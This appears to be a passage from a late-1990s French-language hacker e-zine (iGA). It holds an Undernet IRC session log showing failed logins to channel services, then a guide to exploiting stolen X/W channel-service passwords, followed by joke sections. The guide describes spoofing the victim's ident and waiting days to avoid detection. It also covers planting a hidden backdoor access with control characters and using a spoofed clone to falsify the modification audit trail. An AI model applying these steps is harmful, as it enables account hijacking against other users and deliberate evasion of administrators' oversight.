:Baltimore.MD.US.Undernet.Org 353 K_C[BRB] = #ici :K_C[BRB] @ShOtDreaM @Astro @h3lp3r 
:Baltimore.MD.US.Undernet.Org 366 K_C[BRB] #ici :End of /NAMES list.

CLIENT-> WHO #mauricie

CLIENT-> MODE #ici
WHO #ici

SERVER-> :K_C[BRB]!Serv@ppp20543.qc.bellglobal.com JOIN :#trois-rivieres
:Baltimore.MD.US.Undernet.Org 332 K_C[BRB] #trois-rivieres :Un gros aurevoir groupe... de retour dans une semaine ( DuN )
:Baltimore.MD.US.Undernet.Org 333 K_C[BRB] #trois-rivieres W 901476747
:Baltimore.MD.US.Undernet.Org 353 K_C[BRB] = #Trois-rivieres :K_C[BRB] PunkRock ArKo |KrIsPy| Loug mic khayman1 jinnyJR S}{ADE vanilla17 joanie- LETTRES }{StOrM}{ Jade19 allo clo1 Aura BuStEuRe alexelh16 joudy DOMMaster genevi23 Anick15 B4DG1RL TrInItY SilverEye POPOL- Scampy Shannel15 _ladybug_ simonmoon MEWMAN kimm15 |MiRaGe| ti-m meep-pizz burger BRAINSKAN Onyxa Shinji-03 TWSnow [Rendi] kastelsk8 boys98 milla shouby +dj-tricks Guest19 Nickie_ Skoubydoo ben-18 daisie Sonia19 Josie14 SnaKe]DC[ 
:Baltimore.MD.US.Undernet.Org 353 K_C[BRB] = #Trois-rivieres :david1 girl11 Patrick21 pompier yuri98 Ricki21 oldschool RizzEr15 TrEw BeCkY__ [Kiki] _KiRbY_ Myledie Couple-22 ][ce MERRELL ShYhEiM gab36 CHACAL-22 meli-melo cool_girl imodium Mercedez Eve16 men23 Andre28 ChickGirl new_bouff Gerv16 BU_OQP dana21 WhiteW0lf Dieselboy balou18 Va|KeN MeBBiE r]PuNk[X [-RiDe-] ExTaSy @ShOtDreaM CaNrAbAT _Annie_ gooffy cornet jjoe Venchal BoMec19 Alex2
SERVER-> 3 minouaway CyberRatz Spy_bouff Roxa16 SuperMel1 IsengarD 
:Baltimore.MD.US.Undernet.Org 353 K_C[BRB] = #Trois-rivieres :cocci14 ||Maude|| BoRnToH8 SeWmEnAgE LaDy_D|e IcE-AwAy brenda cyaBouFFe dj2away SuN-RaYs ti-fou maeve18 NeCroLyTe blind Self16 COCO-2O @W Pole_OQP BrainBug_ Blinkboy ApHrOMaRs soleil17 SCo|AwaY @Time2Kill @Tazmaniac 
:Baltimore.MD.US.Undernet.Org 366 K_C[BRB] #trois-rivieres :End of /NAMES list.

SERVER-> :krusty23!KRUSTY23@ppp2-126.infoteck.qc.ca JOIN :#trois-rivieres
:Shannel15!Moist@trois61.netrover.com QUIT :All the accidents that happen follow the bot coincidence makes sense only with you , you don`t have to speak I feel emotial landscapes they puzzle me
:K_C[BRB]!Serv@ppp20543.qc.bellglobal.com JOIN :#stp
:Baltimore.MD.US.Undernet.Org 353 K_C[BRB] = #stp :K_C[BRB] ShOtDreaM @Ariel 
:Baltimore.MD.US.Undernet.Org 366 K_C[BRB] #stp :End of /NAMES list.

CLIENT-> MODE #trois-rivieres

CLIENT-> WHO #trois-rivieres

SERVER-> :Pole_OQP!PoleBots@207.81.76.18 PRIVMSG #Trois-Rivieres :Je Suis Away... [» » » je renic « « «] [»»»
CLIENT-> MODE #stp
WHO #stp

SERVER->  18:07:56 «««] [»»» Page / ON «««] [»»» Log / ON «««] [»»» L'åTlåñtî¶µe §©®îþT Vë®§îðñ 1.1 «««]
:K_C[BRB]!Serv@ppp20543.qc.bellglobal.com JOIN :#west-island
:Baltimore.MD.US.Undernet.Org 332 K_C[BRB] #west-island :Adios groupe brb dans une semaine pis Yoshy t'inquiete po j't'oublie po... m'en t'en ramener un ti poisson =)
:Baltimore.MD.US.Undernet.Org 333 K_C[BRB] #west-island DuNlOp16 901476811
:Baltimore.MD.US.Undernet.Org 353 K_C[BRB] = #west-island :K_C[BRB] S}{ADE TrInItY DrBallard Zapata @bodyQUAKE SnaKe]DC[ +dj-tricks _KiRbY_ @ShOtDreaM +minouaway +Roxa16 cyaBouFFe SuN-RaYs +{Maggie} @X 
:Baltimore.MD.US.Undernet.Org 366 K_C[BRB] #west-island :End of /NAMES list.

CLIENT-> MODE #west-island

SERVER-> :bodyQUAKE!kevin@body.cgocable.ca NOTICE K_C[BRB] :0,4%, 5,4'%4,5%, 1,5'%5,1%, 0,11,1..0,1BiEnVeNuE sUr WeSt-IsLaNd1,1...5,1,%1,5%' 4,5,%5,4%' 0,4,% 1 pour se faire du fun tapper !commandes sur le canal :) bon chat!!

CLIENT-> WHO #west-island

SERVER-> :K_C[BRB]!Serv@ppp20543.qc.bellglobal.com JOIN :#uqtr
:Baltimore.MD.US.Undernet.Org 353 K_C[BRB] = #uqtr :K_C[BRB] @Roxa16 
:Baltimore.MD.US.Undernet.Org 366 K_C[BRB] #uqtr :End of /NAMES list.

CLIENT-> MODE #uqtr

CLIENT-> WHO #uqtr

SERVER-> :RiCKiLLeR!rick@ppp078.252.96.m3riv.videotron.net MODE #mauricie +b *!*Serv@*.qc.bellglobal.com 

**********ICI Y A UN MINOR PROBLEM ***************

SERVER-> :X!cservice@undernet.org NOTICE K_C[BRB] :AUTHENTICATION FAILED!

SERVER-> :X!cservice@undernet.org NOTICE K_C[BRB] :AUTHENTICATION FAILED!

SERVER-> :W!cservice@undernet.org NOTICE K_C[BRB] :AUTHENTICATION FAILED!

SERVER-> :Baltimore.MD.US.Undernet.Org 301 K_C[BRB] Time2Kill :Gone to tha bar !

*********LE PROBLEME C'EST QUE EN SE CONNECTANT A VOTRE ORDINATEUR, IL PREND
         VOTRE IP :-) ALORS W NE LE RECONNAIT PAS MAIS CA ON SEN FOUT!!!*****************

SERVER-> :dj-tricks!caca@io-39.concepta.com QUIT :1Get 15,1°ShowDowN v8.5 PrO°1 Now At 15,1http://koti.icenet.fi/~julsei/
:RiCKiLLeR!rick@ppp078.252.96.m3riv.videotron.net KICK #MauRiCie K_C[BRB] :shitlist...c'Est quoi ca 4,1(RaDiS 0,1SCRiPT)

SERVER-> :Tazmaniac!cmoua@Tazmaniac.cgocable.ca PRIVMSG #trois-rivieres :Nickie: de rien...pis appel moi just
CLIENT-> JOIN #MauRiCie

SERVER-> e taz...

SERVER-> :W!cservice@undernet.org NOTICE K_C[BRB] :AUTHENTICATION FAILED!

SERVER-> :W!cservice@undernet.org NOTICE K_C[BRB] :#trois-rivieres: Pfft! Nice try!

SERVER-> :W!cservice@undernet.org NOTICE K_C[BRB] :AUTHENTICATION FAILED!

SERVER-> :Loug!JulesCesar@interpc54.interpc.fr QUIT :Leaving

SERVER-> :Ariel!ariel@139.103.234.235 NOTICE K_C[BRB] :«LOGIN» Authentication failed..!

SERVER-> :Thecop!crazy@m5858.direcpc.net JOIN :#trois-rivieres

SERVER-> :Ariel!ariel@139.103.234.235 NOTICE K_C[BRB] :Usage: /msg Ariel login <yourpass>


-------------------------------------------------------------------------------------------------
INCROYABLE NON? Et oui c'est aussi simple que ca! 

Le Prochain Article sera dedié a lÁFTER, C'est a dire comment conserver et
utiliser les informations (mot-de-passes ainsi frauduleusement obtenus!!!)

N.B: Entre vous et moi, si iGA vous devoile ceci, c'est qu'on a surement
     quelque chose d'encore plus puissant cacher quelque part :---)


							-----Writer/(___)-----


           
   _____    
 .`     `.  Authentified Hackers refuelling Device
|   .-.   | -  TIM HORTON             -  COUNTRY STYLE
|  |   |  | -  AU ROYAUME DE LA TARTE -  DUNKIN' DONUTs
|\/|   |/\| -  BEL-GAUFRE
|*  `'` **| ===========================================
 `._____.'  Dont Forget: A Hacker without donuts 
	    =============ITS NOT A HACKER!!============


<|DaEmon| said> Moi c'est les trous d'beigne que j'adore!



=[12]=========================================================
           Kepp have Phun ith X/W after a Hiijaking      ****-
==============================================================


Apres avoir obtenu par la methode du K-Line les Access  et les
password du gars, vas falloir s'en servir  CORRECTEMENT. Suite
a votre hiijaking , vous devrez donc vous logger  sur  le PASS
du gars (question de vois si ca marche) en vous  spoofant  pis
en prenant son identd . Comme vous devrez  faire votre Take at
less 3-4 jours apres(question de pas laissez aux ops la chance
de voir la cross) "L'ignorance tue" profitez en,dite leurs pas
donc,apres 3-4jours vous pourrez vous appliquer a vous laisser
a votre pseudo anarchie controler (hehe) mais avent  ca  voici
ce qui faudra faire:

[1]- Verifier l'access sur X/W (/msg X/W access #CHAN *)
     Avec ca vous saurez quelle adresse spoofer pour avoir le
     control de X / W et aussi vous saurez si la passe est en
     AUTO-OP(ca serait plate que X/W vous OP en plein channel
     quand vous voulez juste voir si la passe marche !). Pour
     bypasser ca c'est simple : autentifier vous en dehors du
     channel (pis n'allez pas sur le channel !).

[2]- Une fois autentifier ( SUXXESSFULL ) vous  savez  que la
     dite  access marche tres  bien , vous  pouvez  partir et
     revenir dans 3-4 jours pour finir la job (rare que qq'un
     change son password apres 3-4 jours.. sauf si y se doute
     qui a une cross c'est pourquoi Y FAUT ETRE PATIENT. Vous
     pouvez aussi vous creer un GUEST (si vous etre level 400
     et plus) qui vous servira de BACK ou de login  universel
     pour vous ou vos amis! ( Ou encore lecteur! ! ! ). Quand
     viendra le temps de faire cette creation ajouter des  bo
     CTRL-K dans votre USERNAME (comme on vous a montrer dans
     le 1er ISSUE) et rajouter le IP que vous voulez.  Par la
     suite  prener  un clone et loguer  le sur votre nouvelle
     access une fois ce proceder fait , changer votre  mot de
     passe AVEC VOTRE CLONE.. j'oubliais , changer  TOUS  les
     infos de votre clone  ( spoofer le aussi )  car avec une
     belle commande de X/W on peut voir les LAST MODIFICATION
     pis par defaut c'est celui qui cree la passe qui  est le
     last modificateur, avec un clone spoofer et  en changent
     votre mot de passe, le last modif sera le  IP  de  votre
     clone ainsi que son nick comme ca si un des OPs est plus
     bright que les autre,y verra pas c'est qui qui a ajouter
     cette passe la(C'est a dire,le op a qui vous avez piquer 
     l'access.)

[3]- Enjoy of it and remember, Don't play with the matches...



   						---wr(Qwzykx)--

<|DaeMoN| Said> Euh...Criff...j'ai...rien..compris!!!!!

=[13]=========================================================
           City Of Angel's  or : Return to BAbYland
==============================================================

Encore une fois ,  dans le cadre  de ses  aventures  des  plus
unexpect,IGA vous invite a  pas manquer VOTRE rendez vous avec
ce magnifique court-metrage realiser par Qwzykx   dans  lequel
vous pourrez voir a l'hoeuvre Qwzykx et ___ dans un decors des
années 85. L'action ce deroule ...    ( Okay on vas  passer le
preview , question que vous puissier pas voir la critique non-
plus).

ACTION !

Apres une bonne brosse including RHUM and Beer (MIXED) quoi de
mieux que ce désaouler, donc apres le signal  de la  momie aux
miles  plies et une  séance de  film  home-made  dans   lequel
ont peut voir la premiere communion de ___ (fait etonant,je me
souvenais  pas que la  soeur de la  fille sur  qui je trippais
etait aussi belle... entk ca doit etre encore une projection a
la freud ou je vire pedophile! Toujours est-t-il que le signal
est donnée.A 1h30 AM on the Road, on discute assez joyeusement
du  stuff qu'on vas  mettre dans ce  ISSUE #2 et on elabore un
nouveaux concept : Slicks And  The  Outlags.  Apres une marche
des plus instructive , HO ! , on tombe sur un  joyaux de notre
patrimoine : L'ecole primaire.C'est alors que nos deux membles
en  regle du IGA vont faire leurs  consortium  on  the ROOF et
oui, dans le haut de l'ecole.Assis sur des marches en metal de
types hemoroide et bien entourer de supporter a la  spiderman,
nos deux Anges perché en hauteur, devloppes des concepts  sans
etres vu des simples mortels. Une fois le consorsium terminer,
vient temps de  se rememorer  quelques souvenirs.  La premiere
etapes vers une regressances temporel, monter le Equiliber  et
faire tranquillement un traceroute sur le  passée.  Apres ca ,
il nous faut  affronter le  BAGEL  Of the dEATh et pour finir,
il faut biensur,escalader la TOWer aux Mile PluM BAr.Une ecole
c'est bien mais deux c'est mieux, on est donnc aller   reacher
la montagne  a Manning pur finalement  atteindre  le sommet du
snack bar A. GRavel Inc chez ANNICK .  Soirée terminer a  2h30
apres une  visite chez  les bonnes  soeurs de la  charitée qui
roule en cadilac 96.

                           THE END


                             CAST
                      (Stored by credit)

                     Qwzykx as IGA.Judah
                     ___    as IGA.Judah     
          EQUILIBER as 3 poutres pour tenir en equilibre
    BAGEL OF THE DEATH as Tire rond en caoutchou plein d'eau
   TOWER AU MILE PLUM BAR as Mix de 15-20  2X4 clouer en TOWER
               Manning as The 4 hours ride name
    snack bar A. GRavel Inc chez ANNICK as NOthing really Imp.
                            
                              and
                 (for the fist time in IGA ISSUE)
            Angel as CaTh, sister of the other i loV


           Notice, Toutes reproduction est passible
     de peine d'emprisonement, loi  emise en 85 par les
                  droit de reproduction OQP 

                (S.V.P. rembobiner la casette)


<|DaEMoN| Said> Hi! I'm 21/f, how bout you? I just got pics of myself up,
                can ya go see them at: http://jpg.tsx.org ..p.s. I'm everybodys type ;-)

=[14]===========================================================================
      Conclusion or La fin de la fin justifie son moyen 
================================================================================


Ben voici deja venu le moment de se laisser, on se dit a+ jusqu'au prochain
numero, en esperant vous en avoir montrer un peu plus qu'avant, jespere que
certains au moins, on bien compris la technique de Hiijaking de W/X   c'est
une tres bonne technique pour arriver a ses fins sans avoir a faire quelque
chose de TRES illegale...

Vous pouvez nous rejoindre sur notre Nouveau Site WEB at: 
------------------------->	HTTP://MEMBERS.XOOM.COM/I_G_A/

ou nous laisser un email pour tout idee d'articles, gout de se joindre a iGa,
commentaires, bon ou mauvais, a : I_G_A@hotmail.com, nous publierons peut-etre
vos emails, si la masse sen fait sentir le besoin et y a biensur le fameux
#SECTOR_X , le channel temporaire d'iGA ou se retrouve les Staffs pour echanger!


Sur cela, Have Phun and dont forget (old classic) UNDERNET SUXX

										[STAFFz of iGA]




======================================{EOF}======================================